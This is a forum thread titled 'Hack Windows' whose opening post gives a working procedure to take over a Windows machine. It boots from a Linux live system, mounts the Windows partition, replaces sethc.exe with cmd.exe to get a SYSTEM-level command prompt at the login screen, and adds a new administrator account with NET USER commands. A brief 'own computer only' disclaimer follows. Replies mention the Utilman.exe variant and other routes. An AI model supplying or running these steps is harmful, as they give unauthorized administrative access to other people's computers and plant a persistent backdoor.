Hack Windows: System privilege command prompt
This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. shouldn't take more than 3 minutes. It replaces sethc.exe which can be invoked at start-up by pressing shift five times (something to do with contrast) with cmd.exe: Since you haven't logged in yet it opens a command prompt with system privileges (runs in backtrack).
Code:
mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown –r now
To make a new admin that you can login to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)
Code:
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine). :cool:
(please only use on your own computer or with other people's permission)
Re: Hack Windows: System privilege command prompt
FYI, the same trick can be used by replacing Utilman.exe, but different key sequence. Here's a blog post about it: http://blog.didierstevens.com/2006/0...th-utilmanexe/
Almost 5 years old too. Still, a good trick.
AW: Hack Windows: System privilege command prompt
Maybe its possible to execute this directly i.e. on the Windows Setup -> Tools -> CommandPrompt ?
Remember there was a trick on XP with the screensaver and cmd.exe ?! could that be the same?
